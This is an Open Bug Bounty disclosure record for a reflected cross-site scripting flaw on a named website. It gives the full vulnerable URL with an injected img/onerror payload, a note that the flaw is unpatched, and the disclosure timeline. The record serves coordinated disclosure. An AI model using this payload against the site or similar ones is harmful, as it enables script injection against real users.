Vulnerable URL:
http://m.christiestevens.com/?nats=%22%3E%3Cimg%20src=x%20onerror=prompt(%27OPENBUGBOUNTY%27);%3EMTM5NC4xLjY1LjIzMy4xLjAuMC4wLjA
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
28.07.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
Unknown / Not calculated |
VIP website status: |
No |
Check m.christiestevens.com SSL connection: |
(Grade: F) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
19 February, 2017 11:46 GMT |
Generic security notifications sent to website owner |
19 February, 2017 11:49 GMT |
Customized security notification sent to website owner |
19 February, 2017 11:49 GMT |
Notification sent to subscribers (without technical details) |
19 February, 2017 14:17 GMT |
Vulnerability details disclosed by researcher |
23 April, 2017 12:15 GMT |